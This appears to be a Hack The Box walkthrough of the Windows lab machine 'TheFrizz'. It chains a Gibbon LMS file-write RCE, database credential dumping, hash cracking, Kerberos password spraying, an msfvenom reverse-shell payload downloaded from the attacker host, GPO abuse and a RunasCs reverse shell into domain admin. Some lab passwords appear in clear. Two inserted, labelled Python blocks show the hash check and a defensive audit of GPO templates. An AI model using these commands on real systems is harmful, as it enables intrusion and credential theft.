HTB | TheFrizz
This is a Windows box. You can find it here
IP - 10.10.11.60
Nmap
└─$ nmap -sT -p- --min-rate 10000 10.10.11.60 -Pn -oA nmap_ports                                                                                                                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 14:39 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
56383/tcp open  unknown
56387/tcp open  unknown
56397/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 54.76 seconds
└─$ nmap -sC -sV -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56383,56387,56397 10.10.11.60 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 14:41 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-07 16:11:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56383/tcp open  msrpc         Microsoft Windows RPC
56387/tcp open  msrpc         Microsoft Windows RPC
56397/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-05-07T16:12:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.22 seconds
Port 80
Let’s add frizzdc.frizz.htb to the hosts file:
└─$ sudo echo "10.10.11.60 frizzdc.frizz.htb" | sudo tee -a /etc/hosts
[sudo] password for anurag: 
10.10.11.60 frizzdc.frizz.htb
Website

Going through the website, we find the Gibbon LMS staff login page at http://frizzdc.frizz.htb/Gibbon-LMS/

Foothold/shell
CVE-2023-34598
We have found **CVE-2023-34598** on the advisory page; according to it, Gibbon v25.0.0 is vulnerable to Local File Inclusion.
We have found a POC on MaddSec GitHub, and according to that:
In order to exploit the vulnerability, an attacker would need to manipulate the "q" parameter to query a local file. This manipulation would cause the file to be included in the server's response. However, it's important to note that this exploit is only effective for files located within the installation folder and under specific conditions, which exclude PHP files, for instance.
Let’s try to exploit this by requesting gibbon.sql.

There was no interesting information in there.
CVE-2023-45878
On looking for other exploits, we found CVE-2023-45878 and this GitHub exploit:
GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).
Let’s clone the repo and try to exploit CVE-2023-45878 with it.
With that, we are able to run commands on the target.

shell as w.webservice
Now let’s try to get a shell.


We found the database credentials in config.php

MySQL
We have found mysql.exe and we have the credentials. Let’s try to enumerate the databases.
PS C:\xampp\mysql\bin> .\mysql.exe -u <USERNAME> -p"<Password>" -e "show databases;"
Database
gibbon
information_schema
test
List the tables in gibbon:
PS C:\xampp\mysql\bin> .\mysql.exe -u <USERNAME> -p"<Password>" -e "show tables;" gibbon
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
<--SNIP-->
gibbonperson
<--SNIP-->
gibbonunitclassblock
gibbonunitoutcome
gibbonusernameformat
gibbonyeargroup
Display the gibbonperson table:
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "use gibbon; SELECT * from gibbonperson;" -E
*************************** 1. row ***************************
           gibbonPersonID: 0000000001
                    title: Ms.
                  surname: Frizzle
                firstName: Fiona
            preferredName: Fiona
             officialName: Fiona Frizzle
         nameInCharacters: 
                   gender: Unspecified
                 username: f.frizzle
           passwordStrong: <PASSOWRD>
       passwordStrongSalt: /<salt>
       passwordForceReset: N
                   status: Full
                 canLogin: Y
      gibbonRoleIDPrimary: 001
          gibbonRoleIDAll: 001
                      dob: NULL
                    email: f.frizzle@frizz.htb
           emailAlternate: NULL
                image_240: NULL
            lastIPAddress: ::1
            lastTimestamp: 2024-10-29 09:28:59
        lastFailIPAddress: NULL
        lastFailTimestamp: NULL
                failCount: 0
We have found the salt and a hashed password for Fiona Frizzle.
shell as f.frizzle
The password looks like a SHA-256 hash, which Gibbon uses by default:
hash('sha256', $salt . $password)
So the logic is:
HASH = sha256(salt + password)
cracking password
We need to convert the hash and salt to a format that Hashcat understands.
- Hash function: SHA256(salt + password) 
- Hashcat mode: 1420 → sha256($salt.$pass) 
//format
<hash>:/<salt>
The salt is written verbatim, including the leading "/" as stored in passwordStrongSalt. Let’s create a file (e.g., f.frizzle.hash) with this line and run it against rockyou.txt:
└─$ hashcat -m 1420 -a 0 f.frizzle.hash /home/anurag/stuff/rockyou.txt
And we have cracked the password.
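To make the scheme concrete, here is an added Python example (not from the original writeup and not Gibbon's own code) that reproduces the hash('sha256', $salt . $password) check the LMS performs, emits the hash:salt line that hashcat mode 1420 expects, and runs a short candidate list through the same function, which is all hashcat does, at far higher speed. The salt, password and word list are constructed for the example; they are not the values from the box.

```python
import hashlib
import hmac


def gibbon_hash(salt: str, password: str) -> str:
    """Gibbon's default scheme: one unkeyed SHA-256 over salt || password, hex encoded.
    There is no iteration count, so every guess costs a single hash computation."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def to_hashcat_line(hash_hex: str, salt: str) -> str:
    """hashcat -m 1420 (sha256($salt.$pass)) reads one 'hash:salt' per line.
    The salt goes in verbatim, leading '/' included, because that is what was concatenated."""
    return f"{hash_hex}:{salt}"


def verify(stored_hash: str, salt: str, candidate: str) -> bool:
    """The check a login performs; constant-time compare so a prefix match leaks nothing."""
    return hmac.compare_digest(stored_hash, gibbon_hash(salt, candidate))


def find_in_wordlist(stored_hash: str, salt: str, words):
    """Dictionary check: the per-candidate work hashcat does, on a small in-memory list.
    Returns the matching word, or None if no candidate reproduces the stored hash."""
    for word in words:
        word = word.rstrip("\n")
        if verify(stored_hash, salt, word):
            return word
    return None


# Constructed sample values (not the salt or password from the box).
SAMPLE_SALT = "/Gx9constructedSalt"
SAMPLE_PASSWORD = "Spring2024!"
SAMPLE_HASH = gibbon_hash(SAMPLE_SALT, SAMPLE_PASSWORD)
SAMPLE_WORDLIST = ["password", "letmein", "Spring2024!", "frizzle123"]

if __name__ == "__main__":
    print("hashcat input line:", to_hashcat_line(SAMPLE_HASH, SAMPLE_SALT))
    print("recovered:", find_in_wordlist(SAMPLE_HASH, SAMPLE_SALT, SAMPLE_WORDLIST))
```

The point the example makes for the defending side is in gibbon_hash: a salt stops precomputed tables, but a single SHA-256 is still a fast hash, which is why a rockyou run against it finishes in seconds on ordinary hardware.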
shell via tgt
I was not able to validate the credentials via NetExec (SMB) or evil-winrm.

I have checked that the user exists (maybe the password was old?)

I can confirm the credentials using Kerbrute. Note the 7-hour clock skew reported by nmap: Kerberos rejects requests whose timestamp is more than five minutes (the default) off the KDC's clock, so we sync our clock to the DC first.
└─$ sudo ntpdate 10.10.11.60
└─$ ./kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle -v
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/08/25 - Ronnie Flathers @ropnop
2025/05/08 01:30:42 >  Using KDC(s):
2025/05/08 01:30:42 >   10.10.11.60:88
2025/05/08 01:30:43 >  [+] VALID LOGIN:  f.frizzle@frizz.htb:<PASSOWRD>
2025/05/08 01:30:43 >  Done! Tested 1 logins (1 successes) in 0.555 seconds
So that means the credential is correct.
Since we have valid credentials, we can request a TGT and log in with that ticket:
└─$ impacket-getTGT frizz.htb/'f.frizzle':'<PASSWORD>' -dc-ip 10.10.11.60
└─$ export KRB5CCNAME=f.frizzle.ccache
└─$ klist
└─$ evil-winrm -i frizzdc.frizz.htb -k f.frizzle.ccache -r frizz.htb
Alternatively, with the realm set up in the Kerberos client config, we can SSH with the same ticket (-K enables GSSAPI authentication and credential delegation):
ssh f.frizzle@frizz.htb -K
And we found user.txt

Privilege Escalation
Bloodhound
Since we have valid credentials, we can use BloodHound to collect data and analyse it further:
└─$ bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60  -c all  --zip
After checking the privileges of every user, we find that M.SchoolBus has a lot of privileges.

shell as m.schoolbus
Nothing interesting was found via WinPEAS and PowerUp.
Let’s look for hidden files:
PS C:\> ls -force
We found some archives (.7z) in the Recycle Bin.

I tried many ways to copy them, but none of them worked; in the end, I had to use Meterpreter.
- Make a reverse TCP payload via msfvenom 
- Copy it to the Windows box 
- Start a Meterpreter handler and execute the payload 
- Once we have a Meterpreter shell, we can download the files 
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=1234 -f exe -o payload.exe
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-WebRequest -Uri "http://10.10.16.4/payload.exe" -outfile "payload.exe"
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 1234
run
meterpreter > download $IE2XMEG.7z
meterpreter > download $RE2XMEG.7z
I was able to extract $RE2XMEG.7z.

We found some credentials:
└─$ grep -ri "password" wapt/conf
It was base64 encoded, so I could decode it and get the clear-text password.

Let’s use Kerbrute to find which user this password belongs to.
But first, let’s get the list of usernames:
PS C:\Users\f.frizzle> Get-ADUser -Filter * -Properties * | select name
name
----
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice
Now we can copy the list to users.txt and perform a password spray with Kerbrute:
└─$ ./kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 users.txt '<PASSWORD>' -v
We found a match: M.SchoolBus.
Let’s perform the same TGT steps we did for f.frizzle:
└─$ kinit M.SchoolBus@FRIZZ.HTB
└─$ klist
└─$ ssh M.SchoolBus@10.10.11.60 -K
Administrator privilege
From the whoami /groups output, we know we are a member of frizz\Group Policy Creator Owners.
This means we have permission to create Group Policy Objects (GPOs) in the domain.
By default, members of Group Policy Creator Owners can:
- Create new GPOs 
- Edit or delete GPOs they created 
Linking a GPO to an OU is a separate right (write access to the OU's gPLink attribute), which this account evidently also holds, since the New-GPLink below succeeds.

GPO Abuse
Now we use SharpGPOAbuse to add ourselves to the local Administrators group, and for that we need to:
- Create a GPO (here named TestGPO). 
- Link it to the Domain Controllers organizational unit in the frizz.htb domain. 
- Make sure the link is enabled so that the GPO applies to all objects within the OU (i.e., the domain controllers). 
PS C:\Users\M.SchoolBus> New-GPO -Name "TestGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
GpoId       : 416eb50f-4fda-41e6-9475-c7a9bedb6f07
DisplayName : TestGPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2
PS C:\Users\M.SchoolBus>
Now we have to download SharpGPOAbuse and execute it:
PS C:\Users\M.SchoolBus> Invoke-WebRequest -uri "http://10.10.16.7/SharpGPOAbuse.exe" -outfile SharpGPOAbuse.exe
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName TestGPO
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "TestGPO" is: {6A50C9A1-E986-42CF-BAB1-B96C4557E011}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{6A50C9A1-E986-42CF-BAB1-B96C4557E011}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\Users\M.SchoolBus>
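For the defending side of this step: the change SharpGPOAbuse makes is visible on disk in the GptTmpl.inf it names above, as a Restricted Groups entry for the built-in Administrators SID S-1-5-32-544, and that file lives in SYSVOL where every domain member can read it. The following added Python example (not from the original writeup and not part of SharpGPOAbuse) parses the [Group Membership] section out of such a template and reports any Administrators member that is not on an allow list. The sample template is constructed in the Restricted Groups layout and its member SIDs are placeholders, not the box's values.

```python
import configparser
from pathlib import Path

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the built-in Administrators group

# Constructed sample in the Restricted Groups layout; the member SID is a placeholder.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-0000000000-0000000000-0000000000-1106
"""


def parse_group_membership(text):
    """Return {group_sid: [member_sid, ...]} from the [Group Membership] section.
    Keys have the form '*<group SID>__Members'; values are comma-separated '*<SID>' entries."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str            # keep key text exactly as written (SIDs, '*' prefix)
    cp.read_string(text)
    groups = {}
    if not cp.has_section("Group Membership"):
        return groups
    for key, value in cp.items("Group Membership"):
        if not key.endswith("__Members"):
            continue                # '__Memberof' lines describe nesting, not members
        group = key[: -len("__Members")].lstrip("*")
        members = [m.strip().lstrip("*") for m in value.split(",") if m.strip()]
        groups[group] = members
    return groups


def unexpected_admin_members(text, allowed_sids):
    """SIDs this template pushes into local Administrators that are not on the allow list."""
    members = parse_group_membership(text).get(ADMINISTRATORS_SID, [])
    return [sid for sid in members if sid not in allowed_sids]


def audit_file(path, allowed_sids):
    """Audit a real GptTmpl.inf pulled from SYSVOL. Templates written by Windows are
    UTF-16 LE with a BOM; change the encoding if another tool wrote the file as ASCII."""
    text = Path(path).read_text(encoding="utf-16")
    return unexpected_admin_members(text, allowed_sids)


if __name__ == "__main__":
    # Placeholder allow list: the domain's own Administrator account (RID 500).
    allowed = {"S-1-5-21-0000000000-0000000000-0000000000-500"}
    print("unexpected local admins:", unexpected_admin_members(SAMPLE_GPTTMPL, allowed))
```

Running this over every Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf under \\<domain>\SYSVOL\<domain>\Policies (path pattern from the tool output above) gives a quick inventory of which GPOs grant local admin and to whom; pairing it with the GPO's link targets and the directory-object-modified audit event (ID 5136) on the policy container is what turns the versionNumber bump shown above into an alert.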
Now, ideally, we would log off and log in again for this to take effect, because the new group membership only appears in an access token created at logon; but in our case (since we are on HTB with a shared instance) we cannot do that.
So we will use RunasCs, because we get a permission denied when trying runas.
RunasCs is a utility to run specific processes with different permissions than the user's current logon provides, using explicit credentials. This tool is an improved and open version of the Windows built-in runas.exe. It performs a fresh logon (CreateProcessWithLogonW in the output below), so the new process gets a token that already includes the Administrators membership the GPO just granted.
//on Windows box
PS C:\Users\M.SchoolBus> Invoke-WebRequest -uri "http://10.10.16.7/RunasCs.exe" -OutFile RunasCs.exe
PS C:\Users\M.SchoolBus> .\RunasCs.exe M.SchoolBus <PASSWORD> cmd.exe -r 10.10.16.7:1234
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-bd6f6$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2724 created in background.
PS C:\Users\M.SchoolBus>
//on our machine
└─$ nc -nlvp 1234          
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.60] 63289
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
frizz\m.schoolbus
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA
 Directory of C:\Users\Administrator\Desktop
03/11/2025  04:14 PM    <DIR>          .
03/11/2025  03:37 PM    <DIR>          ..
02/25/2025  03:06 PM             2,083 cleanup.ps1
05/11/2025  08:42 AM                34 root.txt
               2 File(s)          2,117 bytes
               2 Dir(s)   2,085,539,840 bytes free
C:\Users\Administrator\Desktop>
And we have root.txt